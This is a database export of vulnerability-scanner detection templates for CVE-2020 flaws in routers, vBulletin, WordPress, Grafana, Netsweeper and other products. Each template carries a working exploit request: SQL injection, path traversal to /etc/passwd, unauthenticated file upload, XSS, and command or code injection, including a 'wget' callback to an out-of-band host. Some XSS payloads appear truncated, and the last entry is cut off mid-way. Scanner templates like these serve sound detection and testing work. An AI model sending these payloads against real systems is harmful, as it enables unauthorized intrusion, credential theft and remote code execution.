"66477a413521042ccf308177" }, "name": "CVE-2020-12127.yaml", "content": "id: CVE-2020-12127\n\ninfo:\n name: WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure\n author: arafatansari\n severity: high\n description: |\n WAVLINK WN530H4 M30H4.V5030.190403 contains an information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint. This can allow an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and user credentials.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.\n reference:\n - https://cerne.xyz/bugs/CVE-2020-12127\n - https://www.wavlink.com/en_us/product/WL-WN530H4.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-12127\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-12127\n cwe-id: CWE-306\n epss-score: 0.06293\n epss-percentile: 0.93458\n cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wn530h4_firmware\n shodan-query: http.html:\"Wavlink\"\n tags: cve,cve2020,wavlink,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/ExportAllSettings.sh\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Login='\n - 'Password='\n - 'Model='\n - 'AuthMode='\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100dffbff0cc3444989ae4c3286f2188aabc64aed833325784119cb5011f1a954ba022100a340bd327ffe1705d7ab2e5a234fb95df02461a432dbbafbcf937d1d7da6f52a:922c64590222798bb761d5b6d8e72950", "hash": "67c1b446cfe2bde0bacddba3aa6aa081", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308178" }, "name": "CVE-2020-12256.yaml", "content": "id: CVE-2020-12256\n\ninfo:\n name: rConfig 3.9.4 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The rConfig 3.9.4 is vulnerable to cross-site scripting. The devicemgmnt.php file improperly validates the request coming from the user input. Due to this flaw, An attacker can exploit this vulnerability by crafting arbitrary javascript in `deviceId` GET parameter of devicemgmnt.php resulting in execution of the javascript.\n reference:\n - https://www.rconfig.com/downloads/rconfig-3.9.4.zip\n - https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8\n - https://nvd.nist.gov/vuln/detail/CVE-2020-12256\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-12256\n cwe-id: CWE-79\n epss-score: 0.17512\n epss-percentile: 0.95674\n cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 3\n vendor: rconfig\n product: rconfig\n shodan-query: http.title:\"rConfig\"\n tags: cve,cve2020,rconfig,authenticated,xss\n\nhttp:\n - raw:\n - |\n GET /login.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /lib/crud/userprocess.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&pass={{password}}&sublogin=1\n - |\n GET /devicemgmt.php?deviceId=\"> HTTP/1.1\n Host: {{Hostname}}\n\n host-redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(body_3, \"\") && contains(body_3, \"rConfig - Configuration Management\")'\n - 'contains(content_type_3, \"text/html\")'\n condition: and\n# digest: 490a0046304402203df7f7a1fafc6740fbc98163bb2959e9bd581ba8ddfd68573ca0af9a64f081ab02202b23a11ef0e6910123ef3657ed3d2374c3748e4f25a59b1d9d7f2e20b40dd381:922c64590222798bb761d5b6d8e72950", "hash": "751937fc00ff8ddd393373e8e983f5c5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308179" }, "name": "CVE-2020-12259.yaml", "content": "id: CVE-2020-12259\n\ninfo:\n name: rConfig 3.9.4 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php\n reference:\n - https://www.rconfig.com/downloads/rconfig-3.9.4.zip\n - https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8\n - https://nvd.nist.gov/vuln/detail/CVE-2020-12259\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-12259\n cwe-id: CWE-79\n epss-score: 0.16256\n epss-percentile: 0.95859\n cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 3\n vendor: rconfig\n product: rconfig\n shodan-query: http.title:\"rConfig\"\n tags: cve2020,cve,rconfig,authenticated,xss\n\nhttp:\n - raw:\n - |\n GET /login.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /lib/crud/userprocess.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&pass={{password}}&sublogin=1\n - |\n GET /configDevice.php?rid=\"> HTTP/1.1\n Host: {{Hostname}}\n\n host-redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(body_3, \"\") && contains(body_3, \"rConfig - Configuration Management\")'\n - 'contains(content_type_3, \"text/html\")'\n condition: and\n# digest: 4a0a004730450221008538b08ecf8b93aacaac1be17c9980fbd0271e09e3a6e8cc79cfa36012a6d45d02203407d4ecb1e8ce517abd06804bf82b38a837a545c09169a361bbf6dc879e332a:922c64590222798bb761d5b6d8e72950", "hash": "4d95d19635fada55f6a0b6cbcc573ceb", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30817a" }, "name": "CVE-2020-12447.yaml", "content": "id: CVE-2020-12447\n\ninfo:\n name: Onkyo TX-NR585 Web Interface - Directory Traversal\n author: 0x_Akoko\n severity: high\n description: Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion.\n impact: |\n An attacker can access sensitive files on the system, potentially leading to unauthorized access, information disclosure, or further exploitation.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the directory traversal vulnerability.\n reference:\n - https://blog.spookysec.net/onkyo-lfi\n - https://nvd.nist.gov/vuln/detail/CVE-2020-12447\n - https://blog.spookysec.net/onkyo-lfi/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-12447\n cwe-id: CWE-22\n epss-score: 0.01711\n epss-percentile: 0.8752\n cpe: cpe:2.3:o:onkyo:tx-nr585_firmware:1000-0000-000-0008-0000:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: onkyo\n product: tx-nr585_firmware\n tags: cve,cve2020,onkyo,lfi,traversal\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100927c1a44689d7680e0dee3d0c8c5daf8e08fd834eb2fbb5cfea86f3a531c00b9022100c9621cde469f6eace4647eeeb2c70aeea221843a6410e3c169dd9a1f9d162936:922c64590222798bb761d5b6d8e72950", "hash": "b689c1b433bf068296deed853e088096", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30817b" }, "name": "CVE-2020-12478.yaml", "content": "id: CVE-2020-12478\n\ninfo:\n name: TeamPass 2.1.27.36 - Improper Authentication\n author: arafatansari\n severity: high\n description: |\n TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can bypass authentication and gain unauthorized access to sensitive information.\n remediation: |\n Upgrade to a patched version of TeamPass or apply the recommended security patches.\n reference:\n - https://github.com/nilsteampassnet/TeamPass/issues/2764\n - https://nvd.nist.gov/vuln/detail/CVE-2020-12478\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/StarCrossPortal/scalpel\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-12478\n cwe-id: CWE-306\n epss-score: 0.01186\n epss-percentile: 0.8478\n cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: teampass\n product: teampass\n shodan-query: http.html:\"teampass\"\n tags: cve2020,cve,teampass,exposure,unauth\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/files/ldap.debug.txt\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Get all LDAP params'\n\n - type: word\n part: header\n words:\n - \"text/plain\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d6f70c837b7c35ddacae603e0c1e3daa72b7f9d47c89a8c75302c0c8ed6e58d9022013c29b988bbbd1e577d673ae7d7e7f5afcb4c3660336ac45125a6db251230793:922c64590222798bb761d5b6d8e72950", "hash": "49d7e86219b7b2aa27b8c1860a42c09f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30817c" }, "name": "CVE-2020-12720.yaml", "content": "id: CVE-2020-12720\n\ninfo:\n name: vBulletin SQL Injection\n author: pdteam\n severity: critical\n description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control that permits SQL injection attacks.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the underlying system.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of vBulletin.\n reference:\n - https://github.com/rekter0/exploits/tree/master/CVE-2020-12720\n - https://nvd.nist.gov/vuln/detail/CVE-2020-12720\n - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1\n - http://packetstormsecurity.com/files/157716/vBulletin-5.6.1-SQL-Injection.html\n - http://packetstormsecurity.com/files/157904/vBulletin-5.6.1-SQL-Injection.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-12720\n cwe-id: CWE-306\n epss-score: 0.8836\n epss-percentile: 0.98614\n cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vbulletin\n product: vbulletin\n tags: cve2020,cve,vbulletin,sqli,packetstorm\n\nhttp:\n - raw:\n - |\n POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1\n Host: {{Hostname}}\n X-Requested-With: XMLHttpRequest\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\n\n matchers:\n - type: word\n words:\n - \"vbulletinrce\"\n# digest: 4b0a00483046022100dd5074caccc4bc33e801e2c155340a006861f84c7b9080cd7c472e2e80fe4689022100c7a4fa68dacccc39599985db84023c514f3e71b07dfa295da29f38998e823d17:922c64590222798bb761d5b6d8e72950", "hash": "60e50cab269bfc0dbec7152f500788f4", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30817d" }, "name": "CVE-2020-12800.yaml", "content": "id: CVE-2020-12800\n\ninfo:\n name: WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: |\n WordPress Contact Form 7 before 1.3.3.3 allows unrestricted file upload and remote code execution by setting supported_type to php% and uploading a .php% file.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected WordPress site.\n remediation: |\n Update the Contact Form 7 plugin to version 1.3.3.3 or later to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2020-12800\n - https://github.com/amartinsec/CVE-2020-12800\n - https://packetstormsecurity.com/files/157951/WordPress-Drag-And-Drop-Multi-File-Uploader-Remote-Code-Execution.html\n - https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/#developers\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-12800\n cwe-id: CWE-434\n epss-score: 0.97465\n epss-percentile: 0.99957\n cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: codedropz\n product: drag_and_drop_multiple_file_upload_-_contact_form_7\n framework: wordpress\n tags: cve,cve2020,wordpress,wp-plugin,fileupload,wp,rce,packetstorm,intrusive,codedropz\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601\n X-Requested-With: XMLHttpRequest\n\n -----------------------------350278735926454076983690555601\n Content-Disposition: form-data; name=\"supported_type\"\n\n txt%\n -----------------------------350278735926454076983690555601\n Content-Disposition: form-data; name=\"size_limit\"\n\n 5242880\n -----------------------------350278735926454076983690555601\n Content-Disposition: form-data; name=\"action\"\n\n dnd_codedropz_upload\n -----------------------------350278735926454076983690555601\n Content-Disposition: form-data; name=\"type\"\n\n click\n -----------------------------350278735926454076983690555601\n Content-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.txt%\"\n Content-Type: application/x-httpd-php\n\n CVE-2020-12800-{{randstr}}\n -----------------------------350278735926454076983690555601--\n - |\n GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - \"CVE-2020-12800-{{randstr}}\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022014f2c6293b5487344a5211f24394c32eaa0ba6ccb85df0f909313b3a02f980f602202a0cd67991ee177b7b5e7d576271960799fe9c738787a0cd09fb2d5f79319ca0:922c64590222798bb761d5b6d8e72950", "hash": "b69e0b5126a7a0efa11bf1b6a24997e5", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30817e" }, "name": "CVE-2020-13117.yaml", "content": "id: CVE-2020-13117\n\ninfo:\n name: Wavlink Multiple AP - Remote Command Injection\n author: gy741\n severity: critical\n description: Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the \"key\" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may also be affected.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the affected device.\n remediation: |\n Apply the latest firmware update provided by the vendor to mitigate this vulnerability.\n reference:\n - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13117\n - https://github.com/20142995/sectool\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-13117\n cwe-id: CWE-77\n epss-score: 0.07866\n epss-percentile: 0.94083\n cpe: cpe:2.3:o:wavlink:wn575a4_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wn575a4_firmware\n shodan-query: http.title:\"Wi-Fi APP Login\"\n tags: cve,cve2020,wavlink,rce,oast,router\n\nhttp:\n - raw:\n - |\n POST /cgi-bin/login.cgi HTTP/1.1\n Host: {{Hostname}}\n Origin: http://{{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Accept-Encoding: gzip, deflate\n\n newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: body\n words:\n - \"parent.location.replace\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d359f7dda8bb47704e25df9f6ccae4b6c5ae50d87a2f8d96862170e8a3fae74b022100cc9091e18385d3d1fe499c692c8b9095062aaa9ea0f09ddb06e82dede501eb36:922c64590222798bb761d5b6d8e72950", "hash": "bcb56d3f7a71b7a3eba1f7e23bfacdcc", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30817f" }, "name": "CVE-2020-13121.yaml", "content": "id: CVE-2020-13121\n\ninfo:\n name: Submitty <= 20.04.01 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: Submitty through 20.04.01 contains an open redirect vulnerability via authentication/login?old= during an invalid login attempt. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.\n remediation: |\n Upgrade to Submitty version 20.04.01 or later to fix the open redirect vulnerability.\n reference:\n - https://github.com/Submitty/Submitty/issues/5265\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13121\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-13121\n cwe-id: CWE-601\n epss-score: 0.00235\n epss-percentile: 0.60944\n cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: rcos\n product: submitty\n tags: cve,cve2020,redirect,submitty,oos,rcos\n\nhttp:\n - raw:\n - |\n POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Referer: {{RootURL}}/authentication/login\n\n user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a0047304502206f176277eec35ef135b67c205d1cdacbf6a6d6a914b0330fc921447e4d77f10a022100d548e0e86bb67accdbea62a2cb11ff6fdfd956cb47edb0909e50b0bb2324b033:922c64590222798bb761d5b6d8e72950", "hash": "2d38d20933d0019d01cfdff74d58e901", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308180" }, "name": "CVE-2020-13158.yaml", "content": "id: CVE-2020-13158\n\ninfo:\n name: Artica Proxy Community Edition <4.30.000000 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Artica Proxy Community Edition before 4.30.000000 is vulnerable to local file inclusion via the fw.progrss.details.php popup parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system.\n remediation: |\n Upgrade to Artica Proxy Community Edition version 4.30.000000 or later to fix the Local File Inclusion vulnerability.\n reference:\n - https://github.com/InfoSec4Fun/CVE-2020-13158\n - https://sourceforge.net/projects/artica-squid/files/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13158\n - https://github.com/nomi-sec/PoC-in-GitHub\n - https://github.com/soosmile/POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-13158\n cwe-id: CWE-22\n epss-score: 0.96791\n epss-percentile: 0.99659\n cpe: cpe:2.3:a:articatech:artica_proxy:*:*:*:*:community:*:*:*\n metadata:\n max-request: 1\n vendor: articatech\n product: artica_proxy\n tags: cve,cve2020,artica,lfi,articatech\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205aa5e4fc4a2fc1a974f36ab4c73ca7f8d970a1a6bd7e14394f238fa34179b721022061838c49e3fa2d0486bfc7a85f72858cbe25daf49758350e33522632ea43a507:922c64590222798bb761d5b6d8e72950", "hash": "7464fadb59c4cbde196c611a0fbe0de3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308181" }, "name": "CVE-2020-13167.yaml", "content": "id: CVE-2020-13167\n\ninfo:\n name: Netsweeper <=6.4.3 - Python Code Injection\n author: dwisiswant0\n severity: critical\n description: |\n Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system.\n remediation: |\n Upgrade to a patched version of Netsweeper (>=6.4.4) to mitigate this vulnerability.\n reference:\n - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/\n - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13167\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-13167\n cwe-id: CWE-78\n epss-score: 0.97405\n epss-percentile: 0.99917\n cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: netsweeper\n product: netsweeper\n tags: cve2020,cve,netsweeper,rce,python,webadmin\nvariables:\n rand_str: \"{{randstr}}\"\n cmd: 'echo \"{{base64(rand_str)}}\" | base64 -d > /usr/local/netsweeper/webadmin/out'\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%27{{url_encode(hex_encode(cmd))}}%27.decode%28%27hex%27%29%29%23&timeout=5\"\n - \"{{BaseURL}}/webadmin/out\"\n\n headers:\n Referer: \"{{BaseURL}}/webadmin/admin/service_manager_data.php\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - \"{{rand_str}}\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221008c62562d86e9062675832a60abae347f5564380cd4d1f3143a04618fc023ca9a022100c69d9b44376226c036805afae776400ac22ff3adc49ae438eefea5c81b5aac9a:922c64590222798bb761d5b6d8e72950", "hash": "b2b30d3d7206a2386e4fd56fc9b97e4c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308182" }, "name": "CVE-2020-13258.yaml", "content": "id: CVE-2020-13258\n\ninfo:\n name: Contentful <=2020-05-21 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n Contentful through 2020-05-21 for Python contains a reflected cross-site scripting vulnerability via the api parameter to the-example-app.py.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade Contentful to a version that is not vulnerable to CVE-2020-13258 or apply the necessary patches provided by the vendor.\n reference:\n - https://github.com/contentful/the-example-app.py/issues/44\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13258\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-13258\n cwe-id: CWE-79\n epss-score: 0.00464\n epss-percentile: 0.7492\n cpe: cpe:2.3:a:contentful:python_example:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: contentful\n product: python_example\n tags: cve,cve2020,contentful,xss\n\nhttp:\n - raw:\n - |\n GET /?cda'\"&locale=locale=de-DE HTTP/1.1 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"{'api': '\"\n - \"',\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022027c5f2643bd4cd615440112890d0d23c6b5ac5613534bf20e9b6c3f6e67fdac90220773833d83834dbacee963a6c0ea63557e73c73e473d68647ce026eb13c287f16:922c64590222798bb761d5b6d8e72950", "hash": "3d02d5754e1ed00df7a224dc29c41d8a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308183" }, "name": "CVE-2020-13379.yaml", "content": "id: CVE-2020-13379\n\ninfo:\n name: Grafana 3.0.1-7.0.1 - Server-Side Request Forgery\n author: Joshua Rogers\n severity: high\n description: |\n Grafana 3.0.1 through 7.0.1 is susceptible to server-side request forgery via the avatar feature, which can lead to remote code execution. Any unauthenticated user/client can make Grafana send HTTP requests to any URL and return its result. This can be used to gain information about the network Grafana is running on, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks.\n remediation: Upgrade to 6.3.4 or higher.\n reference:\n - https://github.com/advisories/GHSA-wc9w-wvq2-ffm9\n - https://github.com/grafana/grafana/commit/ba953be95f0302c2ea80d23f1e5f2c1847365192\n - http://www.openwall.com/lists/oss-security/2020/06/03/4\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13379\n - http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00060.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H\n cvss-score: 8.2\n cve-id: CVE-2020-13379\n cwe-id: CWE-918\n epss-score: 0.76934\n epss-percentile: 0.97935\n cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: grafana\n product: grafana\n shodan-query: title:\"Grafana\"\n tags: cve2020,cve,grafana,ssrf\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1\"\n - \"{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"cloudflare.com\"\n - \"dns\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"image/jpeg\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205b9bd2aa77748627d7df56b1f9ddb380e47285274318cb1a472d118ac7ea5dab022100e2b67b3e80048d92b7de1e74b9a632e18562312f42d046e47dde1538b01001e1:922c64590222798bb761d5b6d8e72950", "hash": "4f7971d9d0df1ce479057bb6d31683b3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308184" }, "name": "CVE-2020-13405.yaml", "content": "id: CVE-2020-13405\n\ninfo:\n name: Microweber <1.1.20 - Information Disclosure\n author: ritikchaddha,amit-jd\n severity: high\n description: |\n Microweber before 1.1.20 is susceptible to information disclosure via userfiles/modules/users/controller/controller.php. An attacker can disclose the users database via a /modules/ POST request and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information.\n remediation: |\n Upgrade Microweber to version 1.1.20 or later to mitigate the vulnerability.\n reference:\n - https://rhinosecuritylabs.com/research/microweber-database-disclosure/\n - https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13405\n classification:\n cvss-metrics: 